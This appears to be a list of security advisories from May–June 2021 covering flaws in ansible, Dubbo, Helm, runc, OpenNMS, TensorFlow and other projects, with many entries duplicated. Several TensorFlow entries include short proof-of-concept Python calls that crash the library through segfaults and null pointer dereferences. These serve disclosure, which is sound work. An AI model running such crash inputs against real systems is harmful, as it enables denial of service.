Advisories

Jun 2021

Insertion of Sensitive Information into Log File in ansible

A flaw was found in ansible module where credentials are disclosed in the console log by default and not protected by the security feature when using the bitbucket_pipeline_variable module. This flaw allows an attacker to steal bitbucket_pipeline credentials. The highest threat from this vulnerability is to confidentiality.

Insertion of Sensitive Information into Log File in ansible

A flaw was found in ansible. Credentials, such as secrets, are being disclosed in console log by default and not protected by no_log feature when using those modules. An attacker can take advantage of this information to steal those credentials. The highest threat from this vulnerability is to data confidentiality.

Incorrect Authorization

A flaw was found in the BPMN editor. Any authenticated user from any project can see the name of Ruleflow Groups from other projects, despite the user not having access to those projects. The highest threat from this vulnerability is to confidentiality.

Improper Verification of Cryptographic Signature in aws-encryption-sdk-javascript

This ESDK supports a streaming mode where callers may stream the plaintext of signed messages before the ECDSA signature is validated. In addition to these signatures, the ESDK uses AES-GCM encryption and all plaintext is verified before being released to a caller. There is no impact on the integrity of the ciphertext or decrypted plaintext, however some callers may rely on the the ECDSA signature for non-repudiation. Without validating the …

Improper Restriction of Communication Channel to Intended Endpoints

Singularity is an open source container platform. In verions 3.7.2 and 3.7.3, Dde to incorrect use of a default URL, singularity action commands (run/shell/exec) specifying a container using a library:// URI will always attempt to retrieve the container from the default remote endpoint (cloud.sylabs.io) rather than the configured remote endpoint. An attacker may be able to push a malicious container to the default remote endpoint with a URI that is …

Deserialization of Untrusted Data

Each Apache Dubbo server will set a serialization id to tell the clients which serialization protocol it is working on. But for Dubbo, an attacker can choose which serialization id the Provider will use by tampering with the byte preamble flags, aka, not following the server's instruction. This means that if a weak deserializer such as the Kryo and FST are somehow in code scope (e.g. if Kryo is somehow …

Deserialization of Untrusted Data

Apache Dubbo by default supports generic calls to arbitrary methods exposed by provider interfaces. These invocations are handled by the GenericFilter which will find the service and method specified in the first arguments of the invocation and use the Java Reflection API to make the final call. The signature for the $invoke or $invokeAsync methods is Ljava/lang/String;[Ljava/lang/String;[Ljava/lang/Object; where the first argument is the name of the method to invoke, the …

Code Injection

Apache Dubbo supports Script routing which will enable a customer to route the request to the right server. These rules are used by the customers when making a request in order to find the right endpoint. When parsing these rules, Dubbo customers use ScriptEngine and run the rule provided by the script which by default may enable executing arbitrary code.

Authentication Bypass by Spoofing

An authentication bypass vulnerability was found in Kiali in versions before 1.31.0 when the authentication strategy OpenID is used. When RBAC is enabled, Kiali assumes that some of the token validation is handled by the underlying cluster. When OpenID implicit flow is used with RBAC turned off, this token validation doesn't occur, and this allows a malicious user to bypass the authentication.

May 2021

Argument Injection or Modification

An argument injection vulnerability in the Dragonfly gem for Ruby allows remote attackers to read and write to arbitrary files via a crafted URL when the verify_url option is disabled. This may lead to code execution. The problem occurs because the generate and process features mishandle use of the ImageMagick convert utility.

Out-of-bounds Write

A flaw was found in the ZeroMQ server This flaw allows a malicious client to cause a stack buffer overflow on the server by sending crafted topic subscription requests and then unsubscribing. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Improper Neutralization of Special Elements used in a Command ('Command Injection') in @floffah/build

Impact If you are using the esbuild target or command you are at risk of code/option injection. Attackers can use the command line option to maliciously change your settings in order to damage your project. Patches The problem has been patched in v1.0.0 as it uses a proper method to pass configs to esbuild/estrella. Workarounds There is no work around. You should update asap. Notes This notice is mainly just …

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Http4s is a Scala interface for HTTP services. StaticFile.fromUrl can leak the presence of a directory on a server when the URL scheme is not file://, and the URL points to a fetchable resource under its scheme and authority. The function returns F[None], indicating no resource, if url.getFile is a directory, without first checking the scheme or authority of the URL. If a URL connection to the scheme and URL …

Improper Input Validation

A flaw was found in keycloak A Self Stored XSS attack vector escalating to a complete account takeover is possible due to user-supplied data fields not being properly encoded and Javascript code being used to process the data. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.

Use of Incorrectly-Resolved Name or Reference

runc through 1.0.0-rc9 has Incorrect Access Control leading to Escalation of Privileges, related to libcontainer/rootfs_linux.go. To exploit this, an attacker must be able to spawn two containers with custom volume-mount configurations, and be able to run custom images. (This vulnerability does not affect Docker due to an implementation detail that happens to block the attack.)

URL Redirection to Untrusted Site (Open Redirect)

Tenancy multi-tenant is an open source multi-domain controller for the Laravel web framework. In some situations, it is possible to have open redirects where users can be redirected from your site to any other site using a specially crafted URL. This is only the case for installations where the default Hostname Identification is used and the environment uses tenants that have force_https set to true (the default is false).

Reliance on Reverse DNS Resolution for a Security-Critical Action

In Weave Net before version 2.6.3, an attacker able to run a process as root in a container is able to respond to DNS requests from the host and thereby insert themselves as a fake service. In a cluster with an IPv4 internal network, if IPv6 is not totally disabled on the host (via ipv6.disable=1 on the kernel cmdline), it will be either unconfigured or configured on some interfaces, but …

Path Traversal

runc allows a Container Filesystem Breakout via Directory Traversal. To exploit the vulnerability, an attacker must be able to create multiple containers with a fairly specific mount configuration. The problem occurs via a symlink-exchange attack that relies on a race condition.

Path Traversal

Http4s is a Scala interface for HTTP services. StaticFile.fromUrl can leak the presence of a directory on a server when the URL scheme is not file://, and the URL points to a fetchable resource under its scheme and authority. The function returns F[None], indicating no resource, if url.getFile is a directory, without first checking the scheme or authority of the URL. If a URL connection to the scheme and URL …

Out-of-bounds Write

Tendermint before versions 0.33.3, 0.32.10, and 0.31.12 has a denial-of-service vulnerability. Tendermint does not limit the number of P2P connection requests. For each p2p connection, it allocates XXX bytes. Even though this memory is garbage collected once the connection is terminated (due to duplicate IP or reaching a maximum number of inbound peers), temporary memory spikes can lead to OOM (Out-Of-Memory) exceptions. Additionally, Tendermint does not reclaim activeID of a …

Out-of-bounds Write

Tendermint before versions 0.33.3, 0.32.10, and 0.31.12 has a denial-of-service vulnerability. Tendermint does not limit the number of P2P connection requests. For each p2p connection, it allocates XXX bytes. Even though this memory is garbage collected once the connection is terminated (due to duplicate IP or reaching a maximum number of inbound peers), temporary memory spikes can lead to OOM (Out-Of-Memory) exceptions. Additionally, Tendermint does not reclaim activeID of a …

Listing of upload directory contents possible

There's an security issue in prosody-filer versions < 1.0.1 which leads to unwanted directory listings of download directories. An attacker is able to list previous uploads of a certain user by shortening the URL and accessing a URL subdirectors other than /upload/ (or the corresponding user defined root dir) Version 1.0.1 and later fix this problem and allow only direct file access if the full path is known. Directory listings …

Incorrect Authorization

Istio has a remotely exploitable vulnerability where an HTTP request path with multiple slashes or escaped slash characters (%2F or %5C) could potentially bypass an Istio authorization policy when path based authorization rules are used.

Improper Privilege Management

Spring Framework WebFlux applications are vulnerable to a privilege escalation. By (re)creating the temporary storage directory, a locally authenticated malicious user can read or modify files that have been uploaded to the WebFlux application, or overwrite arbitrary files with multipart request data.

Exposure of Sensitive Information to an Unauthorized Actor

Their is an information disclosure vulnerability in Helm from version 3.1.0 and before version 3.2.0. lookup is a Helm template function introduced in Helm v3. It is able to lookup resources in the cluster to check for the existence of specific resources and get details about them. This can be used as part of the process to render templates. The documented behavior of helm template states that it does not …

Authentication Bypass by Capture-replay

In Hydra (an OAuth2 Server and OpenID Certified™ OpenID Connect Provider written in Go), before version 1.4.0+oryOS.17, when using client authentication method 'private_key_jwt' [1], OpenId specification says the following about assertion jti: "A unique identifier for the token, which can be used to prevent reuse of the token. These tokens MUST only be used once, unless conditions for reuse were negotiated between the parties". Hydra does not check the uniqueness …

Authentication Bypass by Capture-replay

In Hydra (an OAuth2 Server and OpenID Certified™ OpenID Connect Provider written in Go), before version 1.4.0+oryOS.17, when using client authentication method 'private_key_jwt' [1], OpenId specification says the following about assertion jti: "A unique identifier for the token, which can be used to prevent reuse of the token. These tokens MUST only be used once, unless conditions for reuse were negotiated between the parties". Hydra does not check the uniqueness …

URL Redirection to Untrusted Site ('Open Redirect')

OAuth2 Proxy is an open-source reverse proxy and static file server that provides authentication using Providers (Google, GitHub, and others) to validate accounts by email, domain or group. In OAuth2 Proxy before version 7.0.0, for users that use the allowlist domain feature, a domain that ended in a similar way to the intended domain could have been allowed as a redirect. For example, if a allowlist domain was configured for …

URL Redirection to Untrusted Site ('Open Redirect')

OAuth2 Proxy is an open-source reverse proxy and static file server that provides authentication using Providers (Google, GitHub, and others) to validate accounts by email, domain or group. In OAuth2 Proxy before version 7.0.0, for users that use the allowlist domain feature, a domain that ended in a similar way to the intended domain could have been allowed as a redirect. For example, if a allowlist domain was configured for …

Uncontrolled Resource Consumption

ws is an open source WebSocket client and server library for Node. In vulnerable versions of ws, the issue can be mitigated by reducing the maximum allowed length of the request headers.

Incorrect Authorization

Pion WebRTC before 3.0.15 didn't properly tear down the DTLS Connection when certificate verification failed. The PeerConnectionState was set to failed, but a user could ignore that and continue to use the PeerConnection. )A WebRTC implementation shouldn't allow the user to continue if verification has failed.)

Improper Input Validation

A DNS proxy and possible amplification attack vulnerability in WebClientInfo of Apache Wicket allows an attacker to trigger arbitrary DNS lookups from the server when the X-Forwarded-For header is not properly sanitized. This DNS lookup can be engineered to overload an internal DNS server or to slow down request processing of the Apache Wicket application causing a possible denial of service on either the internal infrastructure or the web application …

Improper Input Validation

A DNS proxy and possible amplification attack vulnerability in WebClientInfo of Apache Wicket allows an attacker to trigger arbitrary DNS lookups from the server when the X-Forwarded-For header is not properly sanitized. This DNS lookup can be engineered to overload an internal DNS server or to slow down request processing of the Apache Wicket application causing a possible denial of service on either the internal infrastructure or the web application …

Cross-site Scripting in OpenNMS Horizon

In OpenNMS Horizon, versions opennms-1-0-stable through opennms-27.1.1; OpenNMS Meridian, versions meridian-foundation-2015.1.0-1 through meridian-foundation-2019.1.18-1; meridian-foundation-2020.1.0-1 through meridian-foundation-2020.1.6-1 are vulnerable to Stored Cross-Site Scripting since there is no validation on the input being sent to the name parameter in noticeWizard endpoint. Due to this flaw an authenticated attacker could inject arbitrary script and trick other admin users into downloading malicious files.

Cross-site Scripting in OpenNMS Horizon

In OpenNMS Horizon, versions opennms-1-0-stable through opennms-27.1.1; OpenNMS Meridian, versions meridian-foundation-2015.1.0-1 through meridian-foundation-2019.1.18-1; meridian-foundation-2020.1.0-1 through meridian-foundation-2020.1.6-1 are vulnerable to Stored Cross-Site Scripting, since the function validateFormInput() performs improper validation checks on the input sent to the groupName and groupComment parameters. Due to this flaw, an authenticated attacker could inject arbitrary script and trick other admin users into downloading malicious files which can cause severe damage to the organization using opennms.

Cross-Site Request Forgery in OpenNMS Horizon

In OpenNMS Horizon, versions opennms-1-0-stable through opennms-27.1.1; OpenNMS Meridian, versions meridian-foundation-2015.1.0-1 through meridian-foundation-2019.1.18-1; meridian-foundation-2020.1.0-1 through meridian-foundation-2020.1.6-1 are vulnerable to CSRF, due to no CSRF protection, and since there is no validation of an existing user name while renaming a user. As a result, privileges of the renamed user are being overwritten by the old user and the old user is being deleted from the user list.

Cross-Site Request Forgery in OpenNMS Horizon

In OpenNMS Horizon, versions opennms-1-0-stable through opennms-27.1.1; OpenNMS Meridian, versions meridian-foundation-2015.1.0-1 through meridian-foundation-2019.1.18-1; meridian-foundation-2020.1.0-1 through meridian-foundation-2020.1.6-1 are vulnerable to CSRF, due to no CSRF protection at /opennms/admin/userGroupView/users/updateUser. This flaw allows assigning ROLE_ADMIN security role to a normal user. Using this flaw, an attacker can trick the admin user to assign administrator privileges to a normal user by enticing him to click upon an attacker-controlled website.

Cross-Site Request Forgery in OpenNMS Horizon

In OpenNMS Horizon, versions opennms-1-0-stable through opennms-27.1.1; OpenNMS Meridian, versions meridian-foundation-2015.1.0-1 through meridian-foundation-2019.1.18-1; meridian-foundation-2020.1.0-1 through meridian-foundation-2020.1.6-1 are vulnerable to CSRF, due to no CSRF protection, and since there is no validation of an existing user name while renaming a user. As a result, privileges of the renamed user are being overwritten by the old user and the old user is being deleted from the user list.

Arbitrary code execution due to an uncontrolled search path for the git binary

The go language recently addressed a security issue in the way that binaries are found before being executed. Some operating systems like Windows persist to have the current directory being part of the default search path, and having priority over the system-wide path. This means that it's possible for a malicious user to craft for example a git.bat command, commit it and push it in a repository. Later when git-bug …

Use of Multiple Resources with Duplicate Identifier

In Helm before versions 2.16.11 and 3.3.2, a Helm repository can contain duplicates of the same chart, with the last one always used. If a repository is compromised, this lowers the level of access that an attacker needs to inject a bad chart into a repository. To perform this attack, an attacker must have write access to the index file (which can occur during a MITM attack on a non-SSL …

Use of Multiple Resources with Duplicate Identifier

In Helm before versions 2.16.11 and 3.3.2, a Helm repository can contain duplicates of the same chart, with the last one always used. If a repository is compromised, this lowers the level of access that an attacker needs to inject a bad chart into a repository. To perform this attack, an attacker must have write access to the index file (which can occur during a MITM attack on a non-SSL …

Use of Multiple Resources with Duplicate Identifier

In Helm before versions 2.16.11 and 3.3.2, a Helm repository can contain duplicates of the same chart, with the last one always used. If a repository is compromised, this lowers the level of access that an attacker needs to inject a bad chart into a repository. To perform this attack, an attacker must have write access to the index file (which can occur during a MITM attack on a non-SSL …

Uncontrolled Search Path Element

cloudflared versions prior to 2020.8.1 contain a local privilege escalation vulnerability on Windows systems. When run on a Windows system, cloudflared searches for configuration files which could be abused by a malicious entity to execute commands as a privileged user. Version 2020.8.1 fixes this issue.

Signature Validation Bypass

Impact Given a valid SAML Response, an attacker can potentially modify the document, bypassing signature validation in order to pass off the altered document as a signed one. This enables a variety of attacks, including users accessing accounts other than the one to which they authenticated in the identity provider, or full authentication bypass if an external attacker can obtain an expired, signed SAML Response. Patches A patch is available, …

Reachable Assertion

A flaw was found in OpenLDAP. This flaw allows an attacker who can send a malicious packet to be processed by OpenLDAP’s slapd server, to trigger an assertion failure. The highest threat from this vulnerability is to system availability.

plugin.yaml file allows for duplicate entries in helm

During a security audit of Helm's code base, Helm maintainers identified a bug in which a Helm plugin can contain duplicates of the same entry, with the last one always used. If a plugin is compromised, this lowers the level of access that an attacker needs to modify a plugin's install hooks, causing a local execution attack. To perform this attack, an attacker must have write access to the git …

plugin.yaml file allows for duplicate entries in helm

During a security audit of Helm's code base, Helm maintainers identified a bug in which a Helm plugin can contain duplicates of the same entry, with the last one always used. If a plugin is compromised, this lowers the level of access that an attacker needs to modify a plugin's install hooks, causing a local execution attack. To perform this attack, an attacker must have write access to the git …

NULL Pointer Dereference

In teler before version 0.0.1, if you run teler inside a Docker container and encounter errors.Exit function, it will cause denial-of-service (SIGSEGV) because it does not get process ID and process group ID of teler properly to kills. The issue is patched in teler 0.0.1 and 0.0.1-dev5.1.

NULL Pointer Dereference

In teler before version 0.0.1, if you run teler inside a Docker container and encounter errors.Exit function, it will cause denial-of-service (SIGSEGV) because it doesn't get process ID and process group ID of teler properly to kills. The issue is patched in teler 0.0.1 and 0.0.1-dev5.1.

Information Exposure

Keystone 5 is an open source CMS platform to build Node.js applications. This security advisory relates to a newly discovered capability in our query infrastructure to directly or indirectly expose the values of private fields, bypassing the configured access control.

Incorrect Resource Transfer Between Spheres

containerd is an industry-standard container runtime and is available as a daemon for Linux and Windows. In containerd before versions 1.3.9 and 1.4.3, the containerd-shim API is improperly exposed to host network containers. Access controls for the shim’s API socket verified that the connecting process had an effective UID of 0, but did not otherwise restrict access to the abstract Unix domain socket. This would allow malicious containers running in …

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

In Helm before versions 2.16.11 and 3.3.2, a Helm plugin can contain duplicates of the same entry, with the last one always used. If a plugin is compromised, this lowers the level of access that an attacker needs to modify a plugin's install hooks, causing a local execution attack. To perform this attack, an attacker must have write access to the git repository or plugin archive (.tgz) while being downloaded …

Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

In Helm before versions 2.16.11 and 3.3.2 there is a bug in which the alias field on a Chart.yaml is not properly sanitized. This could lead to the injection of unwanted information into a chart. This issue has been patched in Helm 3.3.2 and 2.16.11. A possible workaround is to manually review the dependencies field of any untrusted chart, verifying that the alias field is either not used, or (if …

Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

In Helm before versions 2.16.11 and 3.3.2 there is a bug in which the alias field on a Chart.yaml is not properly sanitized. This could lead to the injection of unwanted information into a chart. This issue has been patched in Helm 3.3.2 and 2.16.11. A possible workaround is to manually review the dependencies field of any untrusted chart, verifying that the alias field is either not used, or (if …

Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

In Helm before versions 2.16.11 and 3.3.2 there is a bug in which the alias field on a Chart.yaml is not properly sanitized. This could lead to the injection of unwanted information into a chart. This issue has been patched in Helm 3.3.2 and 2.16.11. A possible workaround is to manually review the dependencies field of any untrusted chart, verifying that the alias field is either not used, or (if …

Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

In Helm before versions 2.16.11 and 3.3.2 plugin names are not sanitized properly. As a result, a malicious plugin author could use characters in a plugin name that would result in unexpected behavior, such as duplicating the name of another plugin or spoofing the output to helm –help. This issue has been patched in Helm 3.3.2. A possible workaround is to not install untrusted Helm plugins. Examine the name field …

Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

In Helm before versions 2.16.11 and 3.3.2 plugin names are not sanitized properly. As a result, a malicious plugin author could use characters in a plugin name that would result in unexpected behavior, such as duplicating the name of another plugin or spoofing the output to helm –help. This issue has been patched in Helm 3.3.2. A possible workaround is to not install untrusted Helm plugins. Examine the name field …

Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

In Helm before versions 2.16.11 and 3.3.2 plugin names are not sanitized properly. As a result, a malicious plugin author could use characters in a plugin name that would result in unexpected behavior, such as duplicating the name of another plugin or spoofing the output to helm –help. This issue has been patched in Helm 3.3.2. A possible workaround is to not install untrusted Helm plugins. Examine the name field …

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Singularity (an open source container platform) from version 3.1.1 through 3.6.3 has a vulnerability. Due to insecure handling of path traversal and the lack of path sanitization within unsquashfs, it is possible to overwrite/create any files on the host filesystem during the extraction with a crafted squashfs filesystem. The extraction occurs automatically for unprivileged (either installation or with allow setuid = no) run of Singularity when a user attempt to …

Improper Handling of Exceptional Conditions

In ORY Fosite (the security first OAuth2 & OpenID Connect framework for Go) before version 0.34.0, the TokenRevocationHandler ignores errors coming from the storage. This can lead to unexpected 200 status codes indicating successful revocation while the token is still valid. Whether an attacker can use this for her advantage depends on the ability to trigger errors in the store. This is fixed in version 0.34.0

Improper Handling of Exceptional Conditions

In ORY Fosite (the security first OAuth2 & OpenID Connect framework for Go) before version 0.34.0, the TokenRevocationHandler ignores errors coming from the storage. This can lead to unexpected 200 status codes indicating successful revocation while the token is still valid. Whether an attacker can use this for her advantage depends on the ability to trigger errors in the store. This is fixed in version 0.34.0

Cross-site Scripting

A reflected cross-site scripting (XSS) vulnerability in Shopizer allows remote attackers to inject arbitrary web script or HTML via the ref parameter to a page about an arbitrary product, e.g., a product/insert-product-name-here.html/ref= URL.

Command Injection

The @ronomon/opened library is vulnerable to a command injection vulnerability which would allow a remote attacker to execute commands on the system if the library was used with untrusted input.

accounts: Hash account number using Salt

@alovak found that currently when we build hash of account number we do not "salt" it. Which makes it vulnerable to rainbow table attack. What did you expect to see? I expected salt (some random number from configuration) to be used in hash.AccountNumber I would generate salt per tenant at least (maybe per organization).

Use After Free

A use-after-free was found due to a thread being killed too early. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.

Undefined behavior in `MaxPool3DGradGrad`

The implementation of tf.raw_ops.MaxPool3DGradGrad exhibits undefined behavior by dereferencing null pointers backing attacker-supplied empty tensors: import tensorflow as tf orig_input = tf.constant([0.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPool3DGradGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, padding=padding)

Undefined behavior in `MaxPool3DGradGrad`

The implementation of tf.raw_ops.MaxPool3DGradGrad exhibits undefined behavior by dereferencing null pointers backing attacker-supplied empty tensors: import tensorflow as tf orig_input = tf.constant([0.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPool3DGradGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, padding=padding)

Undefined behavior in `MaxPool3DGradGrad`

The implementation of tf.raw_ops.MaxPool3DGradGrad exhibits undefined behavior by dereferencing null pointers backing attacker-supplied empty tensors: import tensorflow as tf orig_input = tf.constant([0.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPool3DGradGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, padding=padding)

Undefined behavior and `CHECK`-fail in `FractionalMaxPoolGrad`

The implementation of tf.raw_ops.FractionalMaxPoolGrad triggers an undefined behavior if one of the input tensors is empty: import tensorflow as tf orig_input = tf.constant([2, 3], shape=[1, 1, 1, 2], dtype=tf.int64) orig_output = tf.constant([], dtype=tf.int64) out_backprop = tf.zeros([2, 3, 6, 6], dtype=tf.int64) row_pooling_sequence = tf.constant([0], shape=[1], dtype=tf.int64) col_pooling_sequence = tf.constant([0], shape=[1], dtype=tf.int64) tf.raw_ops.FractionalMaxPoolGrad( orig_input=orig_input, orig_output=orig_output, out_backprop=out_backprop, row_pooling_sequence=row_pooling_sequence, col_pooling_sequence=col_pooling_sequence, overlapping=False) The code is also vulnerable to a denial of service attack as a …

Undefined behavior and `CHECK`-fail in `FractionalMaxPoolGrad`

The implementation of tf.raw_ops.FractionalMaxPoolGrad triggers an undefined behavior if one of the input tensors is empty: import tensorflow as tf orig_input = tf.constant([2, 3], shape=[1, 1, 1, 2], dtype=tf.int64) orig_output = tf.constant([], dtype=tf.int64) out_backprop = tf.zeros([2, 3, 6, 6], dtype=tf.int64) row_pooling_sequence = tf.constant([0], shape=[1], dtype=tf.int64) col_pooling_sequence = tf.constant([0], shape=[1], dtype=tf.int64) tf.raw_ops.FractionalMaxPoolGrad( orig_input=orig_input, orig_output=orig_output, out_backprop=out_backprop, row_pooling_sequence=row_pooling_sequence, col_pooling_sequence=col_pooling_sequence, overlapping=False) The code is also vulnerable to a denial of service attack as a …

Undefined behavior and `CHECK`-fail in `FractionalMaxPoolGrad`

The implementation of tf.raw_ops.FractionalMaxPoolGrad triggers an undefined behavior if one of the input tensors is empty: import tensorflow as tf orig_input = tf.constant([2, 3], shape=[1, 1, 1, 2], dtype=tf.int64) orig_output = tf.constant([], dtype=tf.int64) out_backprop = tf.zeros([2, 3, 6, 6], dtype=tf.int64) row_pooling_sequence = tf.constant([0], shape=[1], dtype=tf.int64) col_pooling_sequence = tf.constant([0], shape=[1], dtype=tf.int64) tf.raw_ops.FractionalMaxPoolGrad( orig_input=orig_input, orig_output=orig_output, out_backprop=out_backprop, row_pooling_sequence=row_pooling_sequence, col_pooling_sequence=col_pooling_sequence, overlapping=False) The code is also vulnerable to a denial of service attack as a …

Type confusion during tensor casts lead to dereferencing null pointers

Calling TF operations with tensors of non-numeric types when the operations expect numeric tensors result in null pointer dereferences. There are multiple ways to reproduce this, listing a few examples here: import tensorflow as tf import numpy as np data = tf.random.truncated_normal(shape=1,mean=np.float32(20.8739),stddev=779.973,dtype=20,seed=64) import tensorflow as tf import numpy as np data = tf.random.stateless_truncated_normal(shape=1,seed=[63,70],mean=np.float32(20.8739),stddev=779.973,dtype=20) import tensorflow as tf import numpy as np data = tf.one_hot(indices=[62,50],depth=136,on_value=np.int32(237),off_value=158,axis=856,dtype=20) import tensorflow as tf import numpy …

Type confusion during tensor casts lead to dereferencing null pointers

Calling TF operations with tensors of non-numeric types when the operations expect numeric tensors result in null pointer dereferences. There are multiple ways to reproduce this, listing a few examples here: import tensorflow as tf import numpy as np data = tf.random.truncated_normal(shape=1,mean=np.float32(20.8739),stddev=779.973,dtype=20,seed=64) import tensorflow as tf import numpy as np data = tf.random.stateless_truncated_normal(shape=1,seed=[63,70],mean=np.float32(20.8739),stddev=779.973,dtype=20) import tensorflow as tf import numpy as np data = tf.one_hot(indices=[62,50],depth=136,on_value=np.int32(237),off_value=158,axis=856,dtype=20) import tensorflow as tf import numpy …

Type confusion during tensor casts lead to dereferencing null pointers

Calling TF operations with tensors of non-numeric types when the operations expect numeric tensors result in null pointer dereferences. There are multiple ways to reproduce this, listing a few examples here: import tensorflow as tf import numpy as np data = tf.random.truncated_normal(shape=1,mean=np.float32(20.8739),stddev=779.973,dtype=20,seed=64) import tensorflow as tf import numpy as np data = tf.random.stateless_truncated_normal(shape=1,seed=[63,70],mean=np.float32(20.8739),stddev=779.973,dtype=20) import tensorflow as tf import numpy as np data = tf.one_hot(indices=[62,50],depth=136,on_value=np.int32(237),off_value=158,axis=856,dtype=20) import tensorflow as tf import numpy …

Stack overflow due to looping TFLite subgraph

TFlite graphs must not have loops between nodes. However, this condition was not checked and an attacker could craft models that would result in infinite loop during evaluation. In certain cases, the infinite loop would be replaced by stack overflow due to too many recursive calls.

Stack overflow due to looping TFLite subgraph

TFlite graphs must not have loops between nodes. However, this condition was not checked and an attacker could craft models that would result in infinite loop during evaluation. In certain cases, the infinite loop would be replaced by stack overflow due to too many recursive calls.

Stack overflow due to looping TFLite subgraph

TFlite graphs must not have loops between nodes. However, this condition was not checked and an attacker could craft models that would result in infinite loop during evaluation. In certain cases, the infinite loop would be replaced by stack overflow due to too many recursive calls.

Session operations in eager mode lead to null pointer dereferences

In eager mode (default in TF 2.0 and later), session operations are invalid. However, users could still call the raw ops associated with them and trigger a null pointer dereference: import tensorflow as tf tf.raw_ops.GetSessionTensor(handle=['\x12\x1a\x07'],dtype=4) import tensorflow as tf tf.raw_ops.DeleteSessionTensor(handle=['\x12\x1a\x07'])

Segfault in tf.raw_ops.ImmutableConst

Calling tf.raw_ops.ImmutableConst with a dtype of tf.resource or tf.variant results in a segfault in the implementation as code assumes that the tensor contents are pure scalars. >>> import tensorflow as tf >>> tf.raw_ops.ImmutableConst(dtype=tf.resource, shape=[], memory_region_name="/tmp/test.txt") … Segmentation fault

Segfault in tf.raw_ops.ImmutableConst

Calling tf.raw_ops.ImmutableConst with a dtype of tf.resource or tf.variant results in a segfault in the implementation as code assumes that the tensor contents are pure scalars. >>> import tensorflow as tf >>> tf.raw_ops.ImmutableConst(dtype=tf.resource, shape=[], memory_region_name="/tmp/test.txt") … Segmentation fault

Segfault in tf.raw_ops.ImmutableConst

Calling tf.raw_ops.ImmutableConst with a dtype of tf.resource or tf.variant results in a segfault in the implementation as code assumes that the tensor contents are pure scalars. >>> import tensorflow as tf >>> tf.raw_ops.ImmutableConst(dtype=tf.resource, shape=[], memory_region_name="/tmp/test.txt") … Segmentation fault

Segfault in SparseCountSparseOutput

Specifying a negative dense shape in tf.raw_ops.SparseCountSparseOutput results in a segmentation fault being thrown out from the standard library as std::vector invariants are broken. import tensorflow as tf indices = tf.constant([], shape=[0, 0], dtype=tf.int64) values = tf.constant([], shape=[0, 0], dtype=tf.int64) dense_shape = tf.constant([-100, -100, -100], shape=[3], dtype=tf.int64) weights = tf.constant([], shape=[0, 0], dtype=tf.int64) tf.raw_ops.SparseCountSparseOutput(indices=indices, values=values, dense_shape=dense_shape, weights=weights, minlength=79, maxlength=96, binary_output=False)

Segfault in SparseCountSparseOutput

Specifying a negative dense shape in tf.raw_ops.SparseCountSparseOutput results in a segmentation fault being thrown out from the standard library as std::vector invariants are broken. import tensorflow as tf indices = tf.constant([], shape=[0, 0], dtype=tf.int64) values = tf.constant([], shape=[0, 0], dtype=tf.int64) dense_shape = tf.constant([-100, -100, -100], shape=[3], dtype=tf.int64) weights = tf.constant([], shape=[0, 0], dtype=tf.int64) tf.raw_ops.SparseCountSparseOutput(indices=indices, values=values, dense_shape=dense_shape, weights=weights, minlength=79, maxlength=96, binary_output=False)

Segfault in SparseCountSparseOutput

Specifying a negative dense shape in tf.raw_ops.SparseCountSparseOutput results in a segmentation fault being thrown out from the standard library as std::vector invariants are broken. import tensorflow as tf indices = tf.constant([], shape=[0, 0], dtype=tf.int64) values = tf.constant([], shape=[0, 0], dtype=tf.int64) dense_shape = tf.constant([-100, -100, -100], shape=[3], dtype=tf.int64) weights = tf.constant([], shape=[0, 0], dtype=tf.int64) tf.raw_ops.SparseCountSparseOutput(indices=indices, values=values, dense_shape=dense_shape, weights=weights, minlength=79, maxlength=96, binary_output=False)

Segfault in `CTCBeamSearchDecoder`

Due to lack of validation in tf.raw_ops.CTCBeamSearchDecoder, an attacker can trigger denial of service via segmentation faults: import tensorflow as tf inputs = tf.constant([], shape=[18, 8, 0], dtype=tf.float32) sequence_length = tf.constant([11, -43, -92, 11, -89, -83, -35, -100], shape=[8], dtype=tf.int32) beam_width = 10 top_paths = 3 merge_repeated = True tf.raw_ops.CTCBeamSearchDecoder( inputs=inputs, sequence_length=sequence_length, beam_width=beam_width, top_paths=top_paths, merge_repeated=merge_repeated)

Segfault in `CTCBeamSearchDecoder`

